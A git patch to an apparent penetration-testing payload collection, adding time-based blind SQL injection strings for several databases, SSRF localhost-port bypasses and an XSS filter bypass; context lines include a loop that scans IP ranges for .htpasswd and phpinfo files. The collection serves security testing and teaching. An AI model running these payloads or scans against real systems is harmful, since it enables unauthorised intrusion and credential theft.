From bb238f730134179ef738ffcfa6f1ecf03a99ed08 Mon Sep 17 00:00:00 2001
From: swisskyrepo <maxropelewski@gmail.com>
Date: Sat, 7 Jan 2017 20:51:47 +0100
Subject: [PATCH] Minor Updates in SQL-SSRF-XSS

---
 Methodology_and_enumeration.md | 16 ++++++++++++++++
 SQL injection/README.md        | 12 ++++++++++++
 SSRF injection/README.md       |  4 ++++
 XSS injection/README.md        |  8 ++++++++
 4 files changed, 40 insertions(+)

diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md
index 1d67f02e..0039afda 100644
--- a/Methodology_and_enumeration.md
+++ b/Methodology_and_enumeration.md
@@ -17,6 +17,7 @@ git clone https://github.com/danielmiessler/SecLists.git
 knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
 ```
 
+
 Using Google Dorks
 ```
 site:*.domain.com -www
@@ -24,6 +25,7 @@ site:http://domain.com ext:php
 site:http://domain.com filetype:pdf
 ```
 
+
 Using Jason Haddix's enumall Recon-ng script, 
 ```
 git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
@@ -41,6 +43,7 @@ cd domain
 -i to feed a list of domains (can also type extra domains into the original command)
 ```
 
+
 * Subdomain take over using HostileSubBruteForcer 
 ```
 git clone https://github.com/nahamsec/HostileSubBruteforcer
@@ -48,6 +51,7 @@ chmox +x sub_brute.rb
 ./sub_brute.rb
 ```
 
+
 * EyeWitness and Nmap scans from the KnockPy and enumall scans
 ```
 git clone https://github.com/ChrisTruncer/EyeWitness.git
@@ -58,6 +62,13 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
 ./EyeWitness -f rdp.txt --rdp
 ```
 
+* Passive recon
+```
+Use shodan to detect similar app
+Use the wayback machine to detect forgotten endpoint
+```
+
+
 * Basic NMAP (if allowed ^^')
 ```
 sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 
@@ -71,6 +82,7 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 • -T4 defines the timing for the task (options are 0-5 and higher is faster)
 ```
 
+
 * List all the subdirectories and files 
 
 Using DirBuster or GoBuster
@@ -86,6 +98,7 @@ More subdomain :
 gobuster -w wordlist -u URL -r -e
 ```
 
+
 Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
 ```
 #!/bin/bash
@@ -100,6 +113,7 @@ for ipa in 98.13{6..9}.{0..255}.{0..255}; do
 wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
 ```
 
+
 * Explore the website with a proxy (ZAP/Burp Suite)
 ```
  - Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
@@ -107,6 +121,7 @@ wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
  - Explore and understand available functionality, noting areas that correspond to vulnerability types
 ```
 
+
 * Look for Web Vulns
 ```
 - SQLi
@@ -116,6 +131,7 @@ wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
 etc
 ```
 
+
 * Look for private information in GitHub repos with GitRob
 ```
 git clone https://github.com/michenriksen/gitrob.git
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 91be3349..1637f656 100644
--- a/SQL injection/README.md	
+++ b/SQL injection/README.md	
@@ -170,6 +170,18 @@ admin") or "1"="1"/*
 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
 
+## Time based
+```
+SQLite : AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))      comment:   -- /**/
+MySQL/MariaDB : AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1       comment: # -- /*!30100 MySQL code*/ 
+MySQL/MariaDB : RLIKE SLEEP([SLEEPTIME])                                                  comment: # -- /*!30100 MySQL code*/ 
+MySQL/MariaDB : OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))                            comment: # -- /*!30100 MySQL code*/ 
+Oracle : AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])                 comment:   -- /**/
+PostGreSQL : AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))                  comment:   -- /**/  
+PostGreSQL : AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))    comment:   -- /**/
+SQL Server : IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'                              comment:   --
+```
+
 ## Polyglot injection (multicontext)
 ```
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index f98d7719..843432ca 100644
--- a/SSRF injection/README.md	
+++ b/SSRF injection/README.md	
@@ -30,5 +30,9 @@ Bypass localhost with a domain redirecting to locahost
 http://n-pn.info
 ```
 
+-> 11211
+localhost:+11211aaa
+localhost:00011211aaaa
+
 ## Thanks to
 * 
\ No newline at end of file
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 6a0dcd94..4df3ce8a 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -294,6 +294,14 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
 <img src='1' onerror='alert(0)' <
 ```
 
+
+Bypass using javascript inside a string
+```
+<script>
+foo="text </script><script>alert(1)</script>";
+</script>
+```
+
 Bypass using an alternate way to execute an alert
 ```
 <script>window['alert'](0)</script>